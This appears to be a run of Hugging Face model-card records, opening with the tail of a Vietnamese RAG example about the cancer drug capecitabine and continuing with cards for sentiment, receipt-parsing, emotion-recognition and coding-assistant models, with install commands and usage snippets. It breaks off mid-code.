context = '''Công dụng thuốc Xelocapec Capecitabine là một hoạt chất gây độc chọn lọc với tế bào ung thư. Hoạt chất này có trong thuốc Xelocapec. Vậy thuốc Xelocapec có tác dụng gì và cần lưu ý những vấn đề nào khi điều trị bằng sản phẩm này? 1. Xelocapec là thuốc gì? Xelocapec chứa hoạt chất Capecitabine hàm lượng 500mg. Thuốc Xelocapec bào chế dạng viên nén bao phim và đóng gói mỗi hộp 3 vỉ x 10 viên. Xelocapec chứa hoạt chất Capecitabine là một dẫn chất Fluoropyrimidine carbamate với tác dụng gây độc chọn lọc với các tế bào ung thư . Mặc dù trên in vitro Capecitabine không cho thấy tác dụng độc tế bào nhưng trên in vivo, Xelocapec biến đổi liên tiếp thành chất gây độc tế bào là 5-fluorouracil (5-FU). Sự hình thành 5-FU tại khối u thông qua xúc tác một cách tối ưu của yếu tố tạo mạch liên quan là Thymidine phosphorylase, qua đó hạn chế tối đa mức độ ảnh hưởng đến nhu mô lành của 5-FU. 2. Thuốc Xelocapec có tác dụng gì? Thuốc Xelocapec được chỉ định điều trị đơn lẻ hoặc kết hợp với các liệu pháp điều trị ung thư. Xelocapec làm chậm hoặc ngăn chặn sự tăng trưởng của tế bào ung thư, do đó giảm kích thước khối u trong những trường hợp sau: Ung thư vú : Xelocapec phối hợp với Docetaxel được chỉ định điều trị ung thư vú thể tiến triển tại chỗ hoặc di căn sau khi đã thất bại với liệu pháp hóa trị; Ung thư đại trực tràng : Xelocapec được chỉ định hỗ trợ điều trị ung thư đại tràng sau phẫu thuật hoặc ung thư đại trực tràng di căn; Ung thư dạ dày : Xelocapec phối hợp với hợp chất platin được chỉ định điều trị khởi đầu cho những bệnh nhân ung thư dạ dày. Chống chỉ định của thuốc Xelocapec : Bệnh nhân quá mẫn cảm với Capecitabine hay các thành phần khác có trong Xelocapec ; Người có tiền sử gặp các phản ứng không mong muốn nghiêm trọng khi điều trị với Fluoropyrimidine; Người đang mang thai hoặc cho con bú; Suy thận nặng (độ thanh thải Creatinin <30mL/phút); Bệnh nhân đang điều trị ung thư với Sorivudin hoặc chất tương tự về mặt hóa học như Brivudin; Bệnh nhân thiếu hụt Dihydropyrimidin dehydrogenase; Bệnh nhân giảm số lượng bạch cầu hoặc tiểu cầu nặng; Suy gan nặng. 3. Liều dùng của thuốc Xelocapec Liều dùng của Xelocapec khi điều trị đơn lẻ: Ung thư đại trực tràng, ung thư vú: 1250mg/m2, uống 2 lần mỗi ngày trong thời gian 14 ngày, tiếp sau đó là 7 ngày ngưng thuốc. Liều Xelocapec trong điều trị phối hợp: Ung thư vú: Liều khởi đầu là 1250mg/m2, 2 lần uống mỗi ngày trong 2 tuần dùng phối hợp với Docetaxel, tiếp sau đó lá 1 tuần ngưng thuốc; Ung thư dạ dày, đại trực tràng: Liều khuyến cáo là 800-1000mg/m2/lần x 2 lần/ngày trong thời gian 2 tuần, sau đó 7 ngày ngưng thuốc hoặc 625mg/m2/lần x 2 lần mỗi ngày khi điều trị liên tục. Thuốc Xelocapec nên uống cùng với thức ăn, do đó thời điểm tốt nhất là trong vòng 30 phút sau bữa ăn. 4. Tác dụng phụ của thuốc Xelocapec Các triệu chứng bất thường như buồn nôn, nôn ói, giảm cảm giác ngon miệng, táo bón, cơ thể mệt mỏi, yếu sức, đau đầu, chóng mặt, khó ngủ có thể xảy ra trong thời gian dùng Xelocapec . Trong đó, tình trạng buồn nôn và nôn ói có thể nghiêm trọng nên đôi khi cần được bác sĩ chỉ định thuốc kiểm soát phù hợp. Tiêu chảy là một tác dụng phụ phổ biến khác của thuốc Xelocapec . Bệnh nhân cần uống nhiều nước khi điều trị bằng Xelocapec trừ khi bác sĩ có hướng dẫn khác. Nôn ói hoặc tiêu chảy kéo dài do thuốc Xelocapec có thể dẫn đến mất nước nghiêm trọng, vì vậy người bệnh hãy liên hệ ngay với bác sĩ nếu có các triệu chứng mất nước như giảm đi tiểu, khô miệng, tăng cảm giác khát nước hoặc chóng mặt. 
Tình trạng rụng tóc tạm thời xảy ra trong thời gian dùng thuốc Xelocapec và có thể hồi phục sau khi điều trị đã kết thúc. Một số bệnh nhân ghi nhận hiện tượng thay đổi móng tay tạm thời. Đối với nam giới và phụ nữ trong độ tuổi sinh đẻ, thuốc Xelocapec có thể ảnh hưởng đến khả năng có con của bệnh nhân. Bệnh nhân hãy tham khảo ý kiến bác sĩ để biết thêm chi tiết. Thuốc Xelocapec có thể làm giảm khả năng miễn dịch của cơ thể với các tác nhân nhiễm trùng, dẫn đến tăng nguy cơ mắc các bệnh nhiễm trùng nghiêm trọng (nhưng hiếm khi gây tử vong) hoặc làm cho bệnh nhiễm trùng hiện mắc nghiêm trọng hơn. Phản ứng dị ứng rất nghiêm trọng với thuốc Xelocapec rất hiếm khi xảy ra. Tuy nhiên, bệnh nhân hãy liên hệ với bác sĩ ngay lập tức nếu xuất hiện các triệu chứng của phản ứng dị ứng nghiêm trọng như phát ban, sưng ngứa mặt/lưỡi/họng, chóng mặt nghiêm trọng hoặc khó thở. 5. Tương tác thuốc của Xelocapec Hoạt chất Capecitabine trong thuốc Xelocapec có thể xảy ra tương tác thuốc nghiêm trọng với một số thuốc sau: Thuốc chống đông máu Coumarin: Trong một nghiên cứu tương tác lâm sàng, sau khi dùng Warfarin liều đơn 20mg kết hợp với Capecitabine làm tăng AUC của S-warfarin khoảng 57% và giá trị INR tăng 91%.'''
question = '''Tại sao Capecitabine trong Xelocapec không gây độc tế bào trên in vitro nhưng lại biến đổi thành 5-fluorouracil (5-FU) gây độc tế bào trên in vivo, và cơ chế nào giúp hạn chế ảnh hưởng đến nhu mô lành của 5-FU?'''
'''Trả lời: Có'''
```
**Developer**
Members: Nguyễn Nho Trung, Nguyễn Nhật Quang
## Contact
**Email**: [email protected]
**LinkedIn**: [Trung Nguyen Nho](https://www.linkedin.com/in/trung-nguyen-nho-604288227/)
**Facebook**: [Nguyễn Nho Trung](https://www.facebook.com/trung.nguyennho.568/)
## Support me:
If you find this work useful and want to support its continued development, here are a few ways you can help:
**Star the Repository**: If you appreciate this work, please give it a star. Your support encourages continued development and improvement.
**Contribute**: Contributions are always welcome! You can help by reporting issues, submitting pull requests, or proposing new features.
**Share**: Share this project with your colleagues, friends, or community. The more people know about it, the more feedback and contributions it attracts.
**Buy me a coffee**: If you would like to support this work financially, please consider a donation. You can donate via:
- BIDV: 2131273046 - NGUYEN NHO TRUNG
## Citation
Please cite as follows:
```Plaintext
@misc{ViRAG-Gen,
      title={ViRAG-Gen: Towards a specialized LLM for RAG task in Vietnamese language.},
author={Nguyen Nho Trung, Nguyen Nhat Quang},
year={2024},
publisher={Huggingface},
}
```
|
rytsar/finetuning-sentiment-model-3000-samples | rytsar | 2024-10-10T07:45:20Z | 105 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-10-10T06:00:28Z | ---
library_name: transformers
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
metrics:
- accuracy
- f1
model-index:
- name: finetuning-sentiment-model-3000-samples
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# finetuning-sentiment-model-3000-samples
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3237
- Accuracy: 0.8667
- F1: 0.8667
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training (a hedged `TrainingArguments` sketch is shown after the list):
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
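
For reference, here is a minimal, hedged sketch of how the hyperparameters above map onto the 🤗 `TrainingArguments`/`Trainer` API. The base model name matches this card, but the dataset wiring is an assumption and is left as a placeholder.

```python
from transformers import (
    AutoModelForSequenceClassification,
    Trainer,
    TrainingArguments,
)

# Assumption: a tokenized sentiment dataset with "input_ids"/"labels" is prepared elsewhere.
model = AutoModelForSequenceClassification.from_pretrained(
    "distilbert-base-uncased", num_labels=2
)

# Mirrors the listed hyperparameters; Adam betas/epsilon are the optimizer defaults.
training_args = TrainingArguments(
    output_dir="finetuning-sentiment-model-3000-samples",
    learning_rate=2e-5,
    per_device_train_batch_size=16,
    per_device_eval_batch_size=16,
    seed=42,
    lr_scheduler_type="linear",
    num_train_epochs=2,
)

# trainer = Trainer(model=model, args=training_args,
#                   train_dataset=train_ds, eval_dataset=eval_ds)
# trainer.train()
```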
### Training results
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
yikai04/DonutCORD-Ver3.0 | yikai04 | 2024-10-10T07:13:27Z | 51 | 0 | transformers | [
"transformers",
"safetensors",
"vision-encoder-decoder",
"image-text-to-text",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | image-text-to-text | 2024-10-08T08:35:56Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
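
While this section is still a placeholder, the snippet below is a hedged sketch of how a Donut-style `VisionEncoderDecoderModel` fine-tuned on CORD-like receipts is typically run with 🤗 Transformers. The assumption that this repository ships a `DonutProcessor`, the task prompt `<s_cord-v2>`, and the input file name are guesses based on the model name, not details confirmed by this card.

```python
import re
from PIL import Image
from transformers import DonutProcessor, VisionEncoderDecoderModel

repo_id = "yikai04/DonutCORD-Ver3.0"                      # this model repository
processor = DonutProcessor.from_pretrained(repo_id)       # assumption: processor files are included
model = VisionEncoderDecoderModel.from_pretrained(repo_id)

image = Image.open("receipt.png").convert("RGB")           # hypothetical input image
pixel_values = processor(image, return_tensors="pt").pixel_values

# The CORD task prompt used by the original Donut checkpoints (an assumption for this fine-tune).
task_prompt = "<s_cord-v2>"
decoder_input_ids = processor.tokenizer(
    task_prompt, add_special_tokens=False, return_tensors="pt"
).input_ids

outputs = model.generate(
    pixel_values,
    decoder_input_ids=decoder_input_ids,
    max_length=model.decoder.config.max_position_embeddings,
    pad_token_id=processor.tokenizer.pad_token_id,
    eos_token_id=processor.tokenizer.eos_token_id,
)

sequence = processor.batch_decode(outputs)[0]
sequence = sequence.replace(processor.tokenizer.eos_token, "").replace(
    processor.tokenizer.pad_token, ""
)
sequence = re.sub(r"<.*?>", "", sequence, count=1).strip()  # strip the task prompt token
print(processor.token2json(sequence))                        # parsed key-value receipt fields
```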
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Rasooli3003/Bert-Sentiment-Fa | Rasooli3003 | 2024-10-10T06:59:37Z | 9 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:farshadafx/Bert-Sentiment-Fa",
"base_model:finetune:farshadafx/Bert-Sentiment-Fa",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-09-05T05:35:11Z | ---
library_name: transformers
license: apache-2.0
base_model: farshadafx/Bert-Sentiment-Fa
tags:
- generated_from_trainer
metrics:
- accuracy
- f1
model-index:
- name: Bert-Sentiment-Fa
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Bert-Sentiment-Fa
This model is a fine-tuned version of [farshadafx/Bert-Sentiment-Fa](https://huggingface.co/farshadafx/Bert-Sentiment-Fa) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 1.4623
- Accuracy: 0.4783
- F1: 0.4829
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 3e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:------:|
| No log | 1.0 | 52 | 1.0841 | 0.4130 | 0.1949 |
| No log | 2.0 | 104 | 1.0502 | 0.4565 | 0.3982 |
| No log | 3.0 | 156 | 1.1478 | 0.5 | 0.5102 |
| No log | 4.0 | 208 | 1.2943 | 0.4783 | 0.4974 |
| No log | 5.0 | 260 | 1.4623 | 0.4783 | 0.4829 |
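
The Accuracy and F1 columns above are standard classification metrics. As a hedged illustration (not necessarily the exact code behind this card), they can be produced during evaluation with a `compute_metrics` callback such as the one below; the choice of weighted F1 averaging is an assumption.

```python
import numpy as np
from sklearn.metrics import accuracy_score, f1_score

def compute_metrics(eval_pred):
    """Convert raw Trainer logits into the accuracy/F1 values reported in the table above."""
    logits, labels = eval_pred
    predictions = np.argmax(logits, axis=-1)
    return {
        "accuracy": accuracy_score(labels, predictions),
        # "weighted" averaging is an assumption; the card does not state which average was used.
        "f1": f1_score(labels, predictions, average="weighted"),
    }

# Wired into training as: Trainer(..., compute_metrics=compute_metrics)
```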
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
ggcristian/TinyEmo-CLIP-Phi-2 | ggcristian | 2024-10-10T06:58:33Z | 10 | 0 | null | [
"tinyemo",
"emotion",
"visual emotion recognition",
"affective computing",
"emotional classification",
"metric learning",
"image-classification",
"en",
"arxiv:2410.07062",
"arxiv:2310.12062",
"base_model:microsoft/phi-2",
"base_model:finetune:microsoft/phi-2",
"region:us"
] | image-classification | 2024-10-02T08:05:32Z | ---
language:
- en
base_model:
- openai/clip-vit-large-patch14
- microsoft/phi-2
pipeline_tag: image-classification
tags:
- emotion
- visual emotion recognition
- affective computing
- emotional classification
- metric learning
---
# TinyEmo-CLIP-Phi-2
[[Paper]](https://arxiv.org/abs/2410.07062)
[TinyEmo GitHub repo](https://github.com/ggcr/TinyEmo)
[Metric Projector Card] [TinyEmo MM-LLM Card]
[[Reasoning Pre-training Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-Pretrain-525k) [[Reasoning Fine-tuning Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-EmoReason-175k) [[Reasoning Claude Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-EmoReasonHQ-Claude-1.4k)
TinyEmo is a family of small multi-modal language models for emotional reasoning and classification. Our
approach features: (1) a synthetic emotional instruct dataset for both pre-training and fine-tuning stages, (2) a Metric Projector
that delegates classification from the language model allowing for more efficient training and inference, (3) a multi-modal large
language model (MM-LLM) for emotional reasoning, and (4) a semi-automated framework for bias detection. TinyEmo is able to
perform emotion classification and emotional reasoning, all while using substantially fewer parameters than comparable models.
This efficiency allows us to freely incorporate more diverse emotional datasets, enabling strong performance on classification tasks,
with our smallest model (700M parameters) outperforming larger state-of-the-art models based on general-purpose MM-LLMs
with over 7B parameters. Additionally, the Metric Projector allows for interpretability and indirect bias detection in large models
without additional training, offering an approach to understand and improve AI systems.
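
To make the role of the Metric Projector more concrete, below is a purely conceptual sketch of the general idea: project frozen CLIP image features into the language model's embedding space and classify by similarity against embeddings of the emotion label names, rather than by generating text. The layer sizes, structure, and classification rule here are assumptions for illustration only and are not the authors' implementation.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class MetricProjector(nn.Module):
    """Illustrative projector: CLIP feature -> LLM embedding space (all sizes are assumptions)."""

    def __init__(self, clip_dim: int = 768, llm_dim: int = 2560):
        super().__init__()
        self.proj = nn.Sequential(
            nn.Linear(clip_dim, llm_dim),
            nn.GELU(),
            nn.Linear(llm_dim, llm_dim),
        )

    def forward(self, clip_features: torch.Tensor) -> torch.Tensor:
        return F.normalize(self.proj(clip_features), dim=-1)

def classify(projector: MetricProjector,
             clip_features: torch.Tensor,
             label_embeds: torch.Tensor) -> torch.Tensor:
    """Delegate classification to a cosine-similarity lookup rather than LLM text generation.

    label_embeds: (num_emotions, llm_dim) embeddings of the emotion label names.
    """
    image_embeds = projector(clip_features)             # (batch, llm_dim)
    label_embeds = F.normalize(label_embeds, dim=-1)
    logits = image_embeds @ label_embeds.T               # cosine similarities
    return logits.argmax(dim=-1)                         # predicted emotion index
```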
## Installation and Requirements
1. Clone this repository and navigate to the root of the project:
```
git clone https://github.com/ggcr/TinyEmo.git
cd TinyEmo
```
2. Create an environment and install dependencies:
```
conda create -n projector_mps python=3.10 -y
conda activate projector_mps
pip install --upgrade pip # enable PEP 660 support
pip install -e projector_mps/.
```
## Quickstart
### Metric Projector inference
We provide precomputed CLIP features for the Emotion6 dataset, and you can evaluate them using two methods:
#### Our Projectors from Hugging Face
To evaluate the projectors from Hugging Face, use the [scripts/eval.sh](https://github.com/ggcr/TinyEmo/blob/main/projector_mps/scripts/eval.sh) script:
```bash
conda activate projector_mps
bash projector_mps/scripts/eval.sh
```
Below is a table of the available projectors:
| Model Architecture | Parameters | Zero-shot Accuracy | HuggingFace Link |
|----------------------------------------| ---------- |--------------------|----------------------------------------------------------------------|
| CLIP ViT-L/14 + OpenELM-270M-I | 0.70B | 57.87% | [HF Projector 0.70B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-OpenELM-270M) |
| CLIP ViT-L/14 + OpenELM-450M-I | 0.88B | 55.24% | [HF Projector 0.88B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-OpenELM-450M) |
| CLIP ViT-L/14 + TinyLLaMA 1.1 | 1.53B | 56.13% | [HF Projector 1.53B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-TinyLlama-1_1-Syn) |
| CLIP ViT-L/14 + Microsoft Phi 2 | 3.21B | 56.28% | [HF Projector 3.21B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-Phi-2) |
#### Custom Projectors with Local Weights
To use custom local weights or models, run the following:
```bash
conda activate projector_mps
bash projector_mps/scripts/eval_custom.sh
```
This allows you to specify different vision encoders, language models, and loss functions, as well as use your own projector weights.
## Acknowledgement
The Metric Projector was built from the foundations of [CLIP-E](https://arxiv.org/abs/2310.12062) paper!
Our codebase for the MM-LLM is forked from the [TinyLLaVA](https://github.com/TinyLLaVA/TinyLLaVA_Factory) project.
## Citation
```
@mastersthesis{gutierrez2024tinyemo,
title = {TinyEmo: Scaling down Emotional Reasoning via Metric Projection},
author = {Cristian Gutierrez},
year = 2024,
month = {September},
address = {Barcelona, Spain},
note = {Available at \url{https://ddd.uab.cat/record/301610?ln=en}},
school = {Universitat Autonoma de Barcelona (UAB)},
type = {Master's thesis in Computer Vision}
}
``` |
ggcristian/TinyEmo-CLIP-OpenELM-450M | ggcristian | 2024-10-10T06:58:15Z | 11 | 0 | null | [
"tinyemo",
"emotion",
"visual emotion recognition",
"affective computing",
"emotional classification",
"metric learning",
"image-classification",
"custom_code",
"en",
"arxiv:2410.07062",
"arxiv:2310.12062",
"base_model:apple/OpenELM-450M-Instruct",
"base_model:finetune:apple/OpenELM-450M-Instruct",
"region:us"
] | image-classification | 2024-10-02T08:03:38Z | ---
language:
- en
base_model:
- apple/OpenELM-450M-Instruct
- openai/clip-vit-large-patch14
pipeline_tag: image-classification
tags:
- emotion
- visual emotion recognition
- affective computing
- emotional classification
- metric learning
---
# TinyEmo-CLIP-OpenELM-450M
[[Paper]](https://arxiv.org/abs/2410.07062)
[TinyEmo GitHub repo](https://github.com/ggcr/TinyEmo)
[Metric Projector Card] [TinyEmo MM-LLM Card]
[[Reasoning Pre-training Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-Pretrain-525k) [[Reasoning Fine-tuning Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-EmoReason-175k) [[Reasoning Claude Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-EmoReasonHQ-Claude-1.4k)
TinyEmo is a family of small multi-modal language models for emotional reasoning and classification. Our
approach features: (1) a synthetic emotional instruct dataset for both pre-training and fine-tuning stages, (2) a Metric Projector
that delegates classification from the language model allowing for more efficient training and inference, (3) a multi-modal large
language model (MM-LLM) for emotional reasoning, and (4) a semi-automated framework for bias detection. TinyEmo is able to
perform emotion classification and emotional reasoning, all while using substantially fewer parameters than comparable models.
This efficiency allows us to freely incorporate more diverse emotional datasets, enabling strong performance on classification tasks,
with our smallest model (700M parameters) outperforming larger state-of-the-art models based on general-purpose MM-LLMs
with over 7B parameters. Additionally, the Metric Projector allows for interpretability and indirect bias detection in large models
without additional training, offering an approach to understand and improve AI systems.
## Installation and Requirements
1. Clone this repository and navigate to the root of the project:
```
git clone https://github.com/ggcr/TinyEmo.git
cd TinyEmo
```
2. Create an environment and install dependencies:
```
conda create -n projector_mps python=3.10 -y
conda activate projector_mps
pip install --upgrade pip # enable PEP 660 support
pip install -e projector_mps/.
```
## Quickstart
### Metric Projector inference
We provide precomputed CLIP features for the Emotion6 dataset, and you can evaluate them using two methods:
#### Our Projectors from Hugging Face
To evaluate the projectors from Hugging Face, use the [scripts/eval.sh](https://github.com/ggcr/TinyEmo/blob/main/projector_mps/scripts/eval.sh) script:
```bash
conda activate projector_mps
bash projector_mps/scripts/eval.sh
```
Below is a table of the available projectors:
| Model Architecture | Parameters | Zero-shot Accuracy | HuggingFace Link |
|----------------------------------------| ---------- |--------------------|----------------------------------------------------------------------|
| CLIP ViT-L/14 + OpenELM-270M-I | 0.70B | 57.87% | [HF Projector 0.70B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-OpenELM-270M) |
| CLIP ViT-L/14 + OpenELM-450M-I | 0.88B | 55.24% | [HF Projector 0.88B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-OpenELM-450M) |
| CLIP ViT-L/14 + TinyLLaMA 1.1 | 1.53B | 56.13% | [HF Projector 1.53B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-TinyLlama-1_1-Syn) |
| CLIP ViT-L/14 + Microsoft Phi 2 | 3.21B | 56.28% | [HF Projector 3.21B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-Phi-2) |
#### Custom Projectors with Local Weights
To use custom local weights or models, run the following:
```bash
conda activate projector_mps
bash projector_mps/scripts/eval_custom.sh
```
This allows you to specify different vision encoders, language models, and loss functions, as well as use your own projector weights.
## Acknowledgement
The Metric Projector was built from the foundations of [CLIP-E](https://arxiv.org/abs/2310.12062) paper!
Our codebase for the MM-LLM is forked from the [TinyLLaVA](https://github.com/TinyLLaVA/TinyLLaVA_Factory) project.
## Citation
```
@mastersthesis{gutierrez2024tinyemo,
title = {TinyEmo: Scaling down Emotional Reasoning via Metric Projection},
author = {Cristian Gutierrez},
year = 2024,
month = {September},
address = {Barcelona, Spain},
note = {Available at \url{https://ddd.uab.cat/record/301610?ln=en}},
school = {Universitat Autonoma de Barcelona (UAB)},
type = {Master's thesis in Computer Vision}
}
``` |
TechxGenus/CursorCore-QW2.5-1.5B-LC | TechxGenus | 2024-10-10T06:43:13Z | 130 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:Qwen/Qwen2.5-Coder-1.5B",
"base_model:finetune:Qwen/Qwen2.5-Coder-1.5B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-05T14:08:14Z | ---
tags:
- code
base_model:
- Qwen/Qwen2.5-Coder-1.5B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>
## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for AI-assisted programming tasks. It is designed to align anything during the programming process and is used to implement features like Tab and Inline Chat.
Script 1:
````python
import torch
